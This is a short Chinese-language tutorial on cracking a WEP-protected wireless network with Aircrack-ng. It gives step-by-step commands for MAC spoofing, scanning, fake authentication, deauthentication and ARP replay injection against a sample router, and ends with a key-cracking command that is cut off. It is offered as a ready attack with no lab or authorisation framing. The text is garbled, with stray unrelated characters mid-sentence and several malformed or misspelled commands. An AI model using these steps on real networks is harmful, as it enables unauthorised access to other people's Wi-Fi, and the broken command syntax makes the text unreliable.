使用Aircrack-ng破解無線網絡
無線網絡的加密工具有哪些?
破解WEP加密的無線網絡
具體操作如下:
1 使用airmon-ng命令查看當前系統中的無線網絡接口赡突。
2 修改wlan0接口的MAC地址嫌拣, 因為MAC地址標識主機所在的網絡亚斋, 在修改MAC地址之前毅待, 需要停止該接口檐涝。
命令如下: airmon-ng stop wlan0
或者如下: ifconfig wlan0 down
執(zhí)行以上命令使得wlan0接口停止了拂到, 此時可以修改MAC地址了痪署,命令如下:
macchanger --mac 00:11:22:33:44:55 wlan0
3 重新啟動wlan0
命令如下: airmon-ng start wlan0
4 使用airodump 命令定位附近所有可用的無線網絡:
命令如下: airodump-ng wlan0
輸出的信息含義如下:
BSSID 無線的IP地址
PWR 網卡報告的信號水平
Beacons 無線發(fā)出的通告編號
#Data 被捕獲到的數據分組的數量, 包括廣播分組
** #/s ** 過去10秒鐘內每秒捕獲的數據分組的數量
5 使用airodump-ng 捕獲指定BSSID的文件
airodump-ng命令常用的選項如下所示兄旬。
- -c:指定選擇的頻道狼犯。
- -w:指定一個文件名,用于保存捕獲的數據领铐。
- -bssid:指定攻擊的BSSID悯森。
示例命令如下: airodump-ng -c wirelessattack -bssid Haddr
6 打開一個新的終端窗口,運行aireplay命令
airplay 命令的語法格式如下:
aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]
aireplay-ng -dauth 1 -a [BSSID] -c [our Chosen MAC address] [Interface]
示例命令如下: aireplay-ng -1 0 -a 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 -e Test mon0
7 使用aireplay發(fā)送一些數據給無線路由器绪撵,以至于能捕獲到數據
aireplay-ng 3 -b [BSSID] -h [Our chosen MAC address] [Interface]
示例命令:
aireplay-ng -3 -b 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 mon0
8 使用Aircrack破解密碼
示例命令: `aircrack-ng -b Haddr
